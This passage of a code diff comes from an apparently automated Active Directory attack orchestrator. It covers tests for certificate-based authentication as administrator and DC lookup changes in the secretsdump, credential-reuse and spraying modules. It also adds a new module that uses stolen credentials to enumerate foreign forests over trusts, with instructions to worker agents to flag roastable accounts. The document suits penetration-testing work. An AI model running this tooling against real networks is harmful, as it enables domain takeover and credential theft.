.and_then(|v| v.as_str()) + .unwrap_or("administrator"); + assert_eq!(user, "admin"); + + // Falls back to "administrator" when no key present + let details2 = serde_json::json!({}); + let user2 = details2 + .get("target_user") + .or_else(|| details2.get("upn")) + .or_else(|| details2.get("account_name")) + 
.and_then(|v| v.as_str()) + .unwrap_or("administrator"); + assert_eq!(user2, "administrator"); + } + + #[test] + fn cert_auth_payload_structure() { + let payload = serde_json::json!({ + "technique": "certipy_auth", + "vuln_id": "cert-001", + "pfx_path": "/tmp/cert.pfx", + "domain": "contoso.local", + "target_user": "administrator", + }); + assert_eq!(payload["technique"], "certipy_auth"); + assert_eq!(payload["pfx_path"], "/tmp/cert.pfx"); + assert_eq!(payload["target_user"], "administrator"); + } + + #[test] + fn cert_auth_payload_with_dc() { + let mut payload = serde_json::json!({ + "technique": "certipy_auth", + "vuln_id": "cert-001", + "pfx_path": "/tmp/cert.pfx", + "domain": "contoso.local", + "target_user": "administrator", + }); + let dc_ip = Some("192.168.58.10".to_string()); + if let Some(ref dc) = dc_ip { + payload["target_ip"] = serde_json::json!(dc); + payload["dc_ip"] = serde_json::json!(dc); + } + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["dc_ip"], "192.168.58.10"); + } + + #[test] + fn cert_auth_payload_without_dc() { + let payload = serde_json::json!({ + "technique": "certipy_auth", + "vuln_id": "cert-001", + "pfx_path": "/tmp/cert.pfx", + "domain": "contoso.local", + "target_user": "administrator", + }); + assert!(payload.get("target_ip").is_none()); + assert!(payload.get("dc_ip").is_none()); + } + + #[test] + fn target_user_upn_fallback() { + let details = serde_json::json!({"upn": "admin@contoso.local"}); + let user = details + .get("target_user") + .or_else(|| details.get("upn")) + .or_else(|| details.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator"); + assert_eq!(user, "admin@contoso.local"); + } + + #[test] + fn target_user_account_name_fallback() { + let details = serde_json::json!({"account_name": "svc_sql"}); + let user = details + .get("target_user") + .or_else(|| details.get("upn")) + .or_else(|| details.get("account_name")) + .and_then(|v| v.as_str()) + 
            .unwrap_or("administrator");
+        assert_eq!(user, "svc_sql");
+    }
+
+    #[test]
+    fn cert_auth_work_construction() {
+        let work = CertAuthWork {
+            vuln_id: "cert-001".into(),
+            dedup_key: "cert_auth:cert-001".into(),
+            pfx_path: "/tmp/cert.pfx".into(),
+            domain: "contoso.local".into(),
+            target_user: "administrator".into(),
+            dc_ip: Some("192.168.58.10".into()),
+        };
+        assert_eq!(work.vuln_id, "cert-001");
+        assert_eq!(work.dc_ip, Some("192.168.58.10".into()));
+    }
+
+    #[test]
+    fn cert_auth_work_no_dc() {
+        let work = CertAuthWork {
+            vuln_id: "cert-002".into(),
+            dedup_key: "cert_auth:cert-002".into(),
+            pfx_path: "/tmp/cert2.pfx".into(),
+            domain: "fabrikam.local".into(),
+            target_user: "admin".into(),
+            dc_ip: None,
+        };
+        assert!(work.dc_ip.is_none());
+    }
+
+    // -- Tests exercising the extracted `collect_cert_auth_work` function --
+
+    use crate::orchestrator::state::SharedState;
+
+    fn make_vuln(
+        vuln_id: &str,
+        vuln_type: &str,
+        details: std::collections::HashMap<String, serde_json::Value>,
+    ) -> ares_core::models::VulnerabilityInfo {
+        ares_core::models::VulnerabilityInfo {
+            vuln_id: vuln_id.into(),
+            vuln_type: vuln_type.into(),
+            target: "192.168.58.10".into(),
+            discovered_by: "test".into(),
+            discovered_at: chrono::Utc::now(),
+            details,
+            recommended_agent: String::new(),
+            priority: 5,
+        }
+    }
+
+    #[tokio::test]
+    async fn collect_empty_state_returns_no_work() {
+        let shared = SharedState::new("test".into());
+        let state = shared.read().await;
+        let work = collect_cert_auth_work(&state);
+        assert!(work.is_empty());
+    }
+
+    #[tokio::test]
+    async fn collect_certificate_obtained_vuln_produces_work() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut s = shared.write().await;
+            let mut details = std::collections::HashMap::new();
+            details.insert("pfx_path".into(), serde_json::json!("/tmp/admin.pfx"));
+            details.insert("domain".into(), serde_json::json!("contoso.local"));
+            details.insert("target_user".into(), serde_json::json!("administrator"));
+
s.discovered_vulnerabilities.insert( + "cert-001".into(), + make_vuln("cert-001", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_id, "cert-001"); + assert_eq!(work[0].pfx_path, "/tmp/admin.pfx"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].target_user, "administrator"); + assert_eq!(work[0].dedup_key, "cert_auth:cert-001"); + assert!(work[0].dc_ip.is_none()); + } + + #[tokio::test] + async fn collect_adcs_certificate_vuln_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/svc.pfx")); + details.insert("domain".into(), serde_json::json!("fabrikam.local")); + details.insert("target_user".into(), serde_json::json!("svc_sql")); + s.discovered_vulnerabilities.insert( + "cert-002".into(), + make_vuln("cert-002", "adcs_certificate", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_id, "cert-002"); + assert_eq!(work[0].domain, "fabrikam.local"); + assert_eq!(work[0].target_user, "svc_sql"); + } + + #[tokio::test] + async fn collect_ignores_non_cert_vuln_types() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + s.discovered_vulnerabilities + .insert("vuln-esc1".into(), make_vuln("vuln-esc1", "esc1", details)); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_skips_exploited_vulnerabilities() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let 
mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-010".into(), + make_vuln("cert-010", "certificate_obtained", details), + ); + s.exploited_vulnerabilities.insert("cert-010".into()); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_skips_already_deduped() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-020".into(), + make_vuln("cert-020", "certificate_obtained", details), + ); + s.mark_processed(DEDUP_CERTIPY_AUTH, "cert_auth:cert-020".into()); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_skips_vuln_without_pfx_path() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // No pfx_path, certificate_path, or cert_file key at all + let mut details = std::collections::HashMap::new(); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-030".into(), + make_vuln("cert-030", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_pfx_fallback_to_certificate_path() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("certificate_path".into(), 
serde_json::json!("/tmp/alt.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-040".into(), + make_vuln("cert-040", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].pfx_path, "/tmp/alt.pfx"); + } + + #[tokio::test] + async fn collect_pfx_fallback_to_cert_file() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("cert_file".into(), serde_json::json!("/tmp/other.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-050".into(), + make_vuln("cert-050", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].pfx_path, "/tmp/other.pfx"); + } + + #[tokio::test] + async fn collect_target_user_defaults_to_administrator() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + // No target_user, upn, or account_name + s.discovered_vulnerabilities.insert( + "cert-060".into(), + make_vuln("cert-060", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "administrator"); + } + + #[tokio::test] + async fn collect_target_user_from_upn() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), 
serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + details.insert("upn".into(), serde_json::json!("admin@contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-070".into(), + make_vuln("cert-070", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "admin@contoso.local"); + } + + #[tokio::test] + async fn collect_target_user_from_account_name() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + details.insert("account_name".into(), serde_json::json!("svc_web")); + s.discovered_vulnerabilities.insert( + "cert-080".into(), + make_vuln("cert-080", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "svc_web"); + } + + #[tokio::test] + async fn collect_resolves_dc_ip_from_domain_controllers() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-090".into(), + make_vuln("cert-090", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, Some("192.168.58.10".into())); + } + + #[tokio::test] + async fn 
collect_dc_ip_none_when_domain_not_mapped() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // DC registered for a different domain + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-100".into(), + make_vuln("cert-100", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert!(work[0].dc_ip.is_none()); + } + + #[tokio::test] + async fn collect_domain_defaults_to_empty_string() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + // No domain key in details + s.discovered_vulnerabilities.insert( + "cert-110".into(), + make_vuln("cert-110", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + } + + #[tokio::test] + async fn collect_case_insensitive_vuln_type() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-120".into(), + make_vuln("cert-120", "CERTIFICATE_OBTAINED", details.clone()), + ); + s.discovered_vulnerabilities.insert( + "cert-121".into(), + make_vuln("cert-121", "Adcs_Certificate", details), + ); + } + let state = shared.read().await; + let work = 
collect_cert_auth_work(&state); + assert_eq!(work.len(), 2); + } + + #[tokio::test] + async fn collect_multiple_vulns_mixed_types() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // Valid cert vuln + let mut d1 = std::collections::HashMap::new(); + d1.insert("pfx_path".into(), serde_json::json!("/tmp/a.pfx")); + d1.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-200".into(), + make_vuln("cert-200", "certificate_obtained", d1), + ); + + // Non-cert vuln (should be ignored) + let mut d2 = std::collections::HashMap::new(); + d2.insert("target_ip".into(), serde_json::json!("192.168.58.22")); + s.discovered_vulnerabilities.insert( + "vuln-smb".into(), + make_vuln("vuln-smb", "smb_signing_disabled", d2), + ); + + // Another valid cert vuln + let mut d3 = std::collections::HashMap::new(); + d3.insert("pfx_path".into(), serde_json::json!("/tmp/b.pfx")); + d3.insert("domain".into(), serde_json::json!("fabrikam.local")); + s.discovered_vulnerabilities.insert( + "cert-201".into(), + make_vuln("cert-201", "adcs_certificate", d3), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 2); + let ids: std::collections::HashSet<_> = work.iter().map(|w| w.vuln_id.as_str()).collect(); + assert!(ids.contains("cert-200")); + assert!(ids.contains("cert-201")); + } + + #[tokio::test] + async fn collect_dc_ip_lookup_is_case_insensitive() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // DC stored under lowercase + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + // Domain in mixed case in vuln details + details.insert("domain".into(), serde_json::json!("CONTOSO.LOCAL")); + s.discovered_vulnerabilities.insert( + 
"cert-130".into(), + make_vuln("cert-130", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, Some("192.168.58.10".into())); + } +} diff --git a/ares-cli/src/orchestrator/automation/credential_access.rs b/ares-cli/src/orchestrator/automation/credential_access.rs index 0baeb0a7..3fe9d5aa 100644 --- a/ares-cli/src/orchestrator/automation/credential_access.rs +++ b/ares-cli/src/orchestrator/automation/credential_access.rs @@ -150,14 +150,14 @@ pub async fn auto_credential_access( if state.is_processed(DEDUP_CRACK_REQUESTS, &dedup) { return None; } - // Exact domain match first - if let Some(dc_ip) = state.domain_controllers.get(&cred_domain).cloned() { + // Exact domain match first (using robust DC resolution) + if let Some(dc_ip) = state.resolve_dc_ip(&cred_domain) { return Some((dedup, dc_ip, cred_domain, cred.clone())); } // Fallback: check child domains (e.g. 
cred has "contoso.local" // but user is actually in "child.contoso.local") let suffix = format!(".{cred_domain}"); - for (domain, dc_ip) in &state.domain_controllers { + for (domain, dc_ip) in &state.all_domains_with_dcs() { if domain.ends_with(&suffix) { debug!( cred_domain = %cred_domain, @@ -552,6 +552,8 @@ pub async fn auto_credential_access( mod tests { use super::*; + // --- kerberoast_dedup_key --- + #[test] fn kerberoast_dedup_key_basic() { assert_eq!( @@ -573,6 +575,8 @@ mod tests { assert_eq!(kerberoast_dedup_key("", ""), "krb::"); } + // --- spray_dedup_key --- + #[test] fn spray_dedup_key_basic() { assert_eq!( @@ -591,6 +595,8 @@ mod tests { assert_eq!(spray_dedup_key("", ""), ":"); } + // --- common_spray_dedup_key --- + #[test] fn common_spray_dedup_key_basic() { assert_eq!( @@ -604,6 +610,8 @@ mod tests { assert_eq!(common_spray_dedup_key(""), "common:"); } + // --- low_hanging_dedup_key --- + #[test] fn low_hanging_dedup_key_basic() { assert_eq!( @@ -617,6 +625,8 @@ mod tests { assert_eq!(low_hanging_dedup_key("", ""), ":"); } + // --- credential_secretsdump_dedup_key --- + #[test] fn credential_secretsdump_dedup_key_basic() { assert_eq!( @@ -639,6 +649,8 @@ mod tests { assert_eq!(credential_secretsdump_dedup_key("", "", ""), "::"); } + // --- resolve_host_domain_from_fqdn --- + #[test] fn resolve_host_domain_from_fqdn_typical() { assert_eq!( @@ -673,6 +685,8 @@ mod tests { assert_eq!(resolve_host_domain_from_fqdn(""), ""); } + // --- is_host_domain_related --- + #[test] fn is_host_domain_related_same_domain() { assert!(is_host_domain_related("contoso.local", "contoso.local")); diff --git a/ares-cli/src/orchestrator/automation/credential_expansion.rs b/ares-cli/src/orchestrator/automation/credential_expansion.rs index 773af2d6..e7a28bc8 100644 --- a/ares-cli/src/orchestrator/automation/credential_expansion.rs +++ b/ares-cli/src/orchestrator/automation/credential_expansion.rs @@ -319,7 +319,11 @@ pub async fn auto_credential_expansion( // This is the 
fastest path from hash → krbtgt → DA. { let state = dispatcher.state.read().await; - let dc_ips: Vec<String> = state.domain_controllers.values().cloned().collect(); + let dc_ips: Vec<String> = state + .all_domains_with_dcs() + .into_iter() + .map(|(_, ip)| ip) + .collect(); drop(state); if !dispatcher.is_technique_allowed("secretsdump") { diff --git a/ares-cli/src/orchestrator/automation/credential_reuse.rs b/ares-cli/src/orchestrator/automation/credential_reuse.rs index ebacf8dd..3573ab06 100644 --- a/ares-cli/src/orchestrator/automation/credential_reuse.rs +++ b/ares-cli/src/orchestrator/automation/credential_reuse.rs @@ -19,6 +19,13 @@ use crate::orchestrator::dispatcher::Dispatcher; const DEDUP_CROSS_REUSE: &str = "cross_reuse"; /// Check if a username is a high-value reuse candidate. +/// +/// Machine accounts (`HOST$`) are NEVER reuse candidates — their NT hash is +/// derived from the computer's randomly-generated 240-byte password and is +/// bound to that computer object in its source NTDS. The hash will not +/// authenticate as another machine, in another domain, or in any trusted +/// forest. Dispatching `secretsdump` with a foreign machine hash always +/// returns STATUS_LOGON_FAILURE and just burns dispatcher budget. 
fn is_reuse_candidate(username: &str) -> bool { if username.ends_with('$') { return false; @@ -87,7 +94,7 @@ pub async fn auto_credential_reuse( let state = dispatcher.state.read().await; // Need at least 2 known DCs (implies multiple domains) - if state.domain_controllers.len() < 2 { + if state.all_domains_with_dcs().len() < 2 { continue; } @@ -105,7 +112,7 @@ pub async fn auto_credential_reuse( for hash in &reuse_candidates { let hash_domain = hash.domain.to_lowercase(); - for (dc_domain, dc_ip) in &state.domain_controllers { + for (dc_domain, dc_ip) in &state.all_domains_with_dcs() { let target_domain = dc_domain.to_lowercase(); // Skip same domain and parent/child domains (handled by secretsdump.rs) diff --git a/ares-cli/src/orchestrator/automation/cross_forest_enum.rs b/ares-cli/src/orchestrator/automation/cross_forest_enum.rs new file mode 100644 index 00000000..f6050184 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/cross_forest_enum.rs @@ -0,0 +1,842 @@ +//! auto_cross_forest_enum -- targeted cross-forest enumeration. +//! +//! When we have Admin Pwn3d on a DC in a foreign forest but haven't enumerated +//! that forest's users/groups, this module dispatches targeted LDAP enumeration +//! using the best available credential path. +//! +//! Unlike `auto_domain_user_enum` (which fires once per domain), this module +//! retries with better credentials as they become available — specifically: +//! - Cracked passwords from cross-forest secretsdump hashes +//! - Credentials obtained via MSSQL linked server pivots +//! - Admin credentials from owned DCs in the foreign forest +//! +//! This covers the gap where the trusted forest's users are not enumerated +//! because initial recon only has primary-forest credentials. 
+ +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Check if a credential belongs to a different forest than the target domain. +fn is_cross_forest(cred_domain: &str, target_domain: &str) -> bool { + let c = cred_domain.to_lowercase(); + let t = target_domain.to_lowercase(); + // Same domain or parent/child = same forest + !(c == t || c.ends_with(&format!(".{t}")) || t.ends_with(&format!(".{c}"))) +} + +/// Build dedup key incorporating the credential to allow retry with better creds. +fn cross_forest_dedup_key(domain: &str, username: &str, cred_domain: &str) -> String { + format!( + "xforest:{}:{}@{}", + domain.to_lowercase(), + username.to_lowercase(), + cred_domain.to_lowercase() + ) +} + +/// Collect cross-forest enumeration work items from the current state. +/// +/// Returns an empty vec when there are fewer than 2 domains, no credentials, +/// or no actionable work to dispatch. +fn collect_cross_forest_work(state: &StateInner) -> Vec<CrossForestWork> { + if state.credentials.is_empty() || state.domains.len() < 2 { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let domain_lower = domain.to_lowercase(); + + // Count how many users we know in this domain. + let known_user_count = state + .credentials + .iter() + .filter(|c| c.domain.to_lowercase() == domain_lower) + .count(); + + // Also count hashes for this domain. + let known_hash_count = state + .hashes + .iter() + .filter(|h| h.domain.to_lowercase() == domain_lower) + .count(); + + // Skip domains where we already have good coverage + // (at least 5 credentials or 10 hashes = likely already enumerated). + if known_user_count >= 5 || known_hash_count >= 10 { + continue; + } + + // Find the best credential for this domain. 
+ // Priority: same-domain cred > admin cred > cracked hash > any cred. + let best_cred = state + .credentials + .iter() + .filter(|c| { + !c.password.is_empty() && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .min_by_key(|c| { + let c_dom = c.domain.to_lowercase(); + if c_dom == domain_lower { + 0 // Same domain = best + } else if c.is_admin { + 1 // Admin from another domain = good (trust auth) + } else if !is_cross_forest(&c_dom, &domain_lower) { + 2 // Same forest = acceptable + } else { + 3 // Cross-forest = may work via trust + } + }) + .cloned(); + + let cred = match best_cred { + Some(c) => c, + None => continue, + }; + + let dedup_key = cross_forest_dedup_key(&domain_lower, &cred.username, &cred.domain); + if state.is_processed(DEDUP_CROSS_FOREST_ENUM, &dedup_key) { + continue; + } + + items.push(CrossForestWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + is_under_enumerated: known_user_count < 3, + }); + } + + items +} + +/// Dispatches targeted user + group enumeration for foreign forests. +/// Interval: 45s. +pub async fn auto_cross_forest_enum( + dispatcher: Arc<Dispatcher>, + mut shutdown: watch::Receiver<bool>, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + // Wait for initial credential discovery and cross-domain pivots. + tokio::time::sleep(Duration::from_secs(120)).await; + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("cross_forest_enum") { + continue; + } + + let work: Vec<CrossForestWork> = { + let state = dispatcher.state.read().await; + collect_cross_forest_work(&state) + }; + if work.is_empty() { + continue; + } + + for item in work { + // Dispatch user enumeration + let user_payload = json!({ + "technique": "ldap_user_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "filters": ["(objectCategory=person)(objectClass=user)"], + "attributes": [ + "sAMAccountName", "description", "memberOf", + "userAccountControl", "servicePrincipalName", + "msDS-AllowedToDelegateTo", "adminCount" + ], + "cross_forest": true, + "instructions": concat!( + "This is a cross-forest enumeration task. Enumerate ALL users in the ", + "target domain via LDAP. If the credential is from a different domain, ", + "authenticate via the forest trust. Report every user found with their ", + "group memberships, SPNs, delegation settings, and description fields. ", + "Pay special attention to accounts with adminCount=1, ", + "DoesNotRequirePreAuth, or interesting SPNs.\n\n", + "IMPORTANT: For each user found, include them in the discovered_users ", + "array with EXACTLY this JSON format:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"ldap_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}\n", + "Also report users with DoesNotRequirePreAuth as vulnerabilities with ", + "vuln_type='asrep_roastable', and users with SPNs as vuln_type='kerberoastable'." 
+ ), + }); + + let priority = dispatcher.effective_priority("cross_forest_enum"); + match dispatcher + .throttled_submit("recon", "recon", user_payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + cred_user = %item.credential.username, + cred_domain = %item.credential.domain, + under_enumerated = item.is_under_enumerated, + "Cross-forest user enumeration dispatched" + ); + } + Ok(None) => { + debug!(domain = %item.domain, "Cross-forest user enum deferred"); + continue; // Don't mark as processed if deferred + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch cross-forest user enum"); + continue; + } + } + + // Also dispatch group enumeration for the same domain + let group_payload = json!({ + "technique": "ldap_group_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "filters": ["(objectCategory=group)"], + "attributes": [ + "sAMAccountName", "member", "memberOf", "managedBy", + "groupType", "objectSid", "description" + ], + "enumerate_members": true, + "resolve_foreign_principals": true, + "cross_forest": true, + "instructions": concat!( + "Enumerate ALL security groups in this domain and their members. ", + "Resolve Foreign Security Principals to their source domain. ", + "Report group name, type (Global/DomainLocal/Universal), members, ", + "and managed-by. 
This is critical for mapping cross-domain attack paths.\n\n", + "IMPORTANT: For each user found in any group, include them in the ", + "discovered_users array with EXACTLY this JSON format:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"ldap_group_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}" + ), + }); + + let group_priority = dispatcher.effective_priority("group_enumeration"); + if let Ok(Some(task_id)) = dispatcher + .throttled_submit("recon", "recon", group_payload, group_priority) + .await + { + info!( + task_id = %task_id, + domain = %item.domain, + "Cross-forest group enumeration dispatched" + ); + } + + // Mark as processed + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_CROSS_FOREST_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_CROSS_FOREST_ENUM, &item.dedup_key) + .await; + } + } +} + +struct CrossForestWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, + is_under_enumerated: bool, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn is_cross_forest_same_domain() { + assert!(!is_cross_forest("contoso.local", "contoso.local")); + } + + #[test] + fn is_cross_forest_child_domain() { + assert!(!is_cross_forest("child.contoso.local", "contoso.local")); + } + + #[test] + fn is_cross_forest_parent_domain() { + assert!(!is_cross_forest("contoso.local", "child.contoso.local")); + } + + #[test] + fn is_cross_forest_different_forests() { + assert!(is_cross_forest("contoso.local", "fabrikam.local")); + } + + #[test] + fn is_cross_forest_case_insensitive() { + assert!(!is_cross_forest("CONTOSO.LOCAL", "contoso.local")); + assert!(is_cross_forest("CONTOSO.LOCAL", "fabrikam.local")); + } + + #[test] + fn dedup_key_format() { + let key = cross_forest_dedup_key("fabrikam.local", "Admin", "CONTOSO.LOCAL"); + assert_eq!(key, "xforest:fabrikam.local:admin@contoso.local"); + } + 
+ #[test] + fn dedup_key_case_insensitive() { + let k1 = cross_forest_dedup_key("FABRIKAM.LOCAL", "Admin", "contoso.local"); + let k2 = cross_forest_dedup_key("fabrikam.local", "admin", "CONTOSO.LOCAL"); + assert_eq!(k1, k2); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_CROSS_FOREST_ENUM, "cross_forest_enum"); + } + + #[test] + fn is_cross_forest_empty_strings() { + // Empty strings are equal (same empty domain) + assert!(!is_cross_forest("", "")); + } + + #[test] + fn is_cross_forest_one_empty() { + assert!(is_cross_forest("contoso.local", "")); + assert!(is_cross_forest("", "contoso.local")); + } + + #[test] + fn is_cross_forest_deeply_nested() { + assert!(!is_cross_forest("a.b.contoso.local", "contoso.local")); + assert!(!is_cross_forest("contoso.local", "a.b.contoso.local")); + } + + #[test] + fn cross_forest_work_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = CrossForestWork { + dedup_key: "xforest:fabrikam.local:admin@contoso.local".into(), + domain: "fabrikam.local".into(), + dc_ip: "192.168.58.20".into(), + credential: cred, + is_under_enumerated: true, + }; + assert!(work.is_under_enumerated); + assert_eq!(work.domain, "fabrikam.local"); + } + + #[test] + fn user_enum_payload_structure() { + let payload = serde_json::json!({ + "technique": "ldap_user_enumeration", + "target_ip": "192.168.58.20", + "domain": "fabrikam.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + "cross_forest": true, + }); + assert_eq!(payload["technique"], "ldap_user_enumeration"); + assert!(payload["cross_forest"].as_bool().unwrap()); + assert_eq!(payload["domain"], "fabrikam.local"); + } + + #[test] + fn group_enum_payload_structure() { 
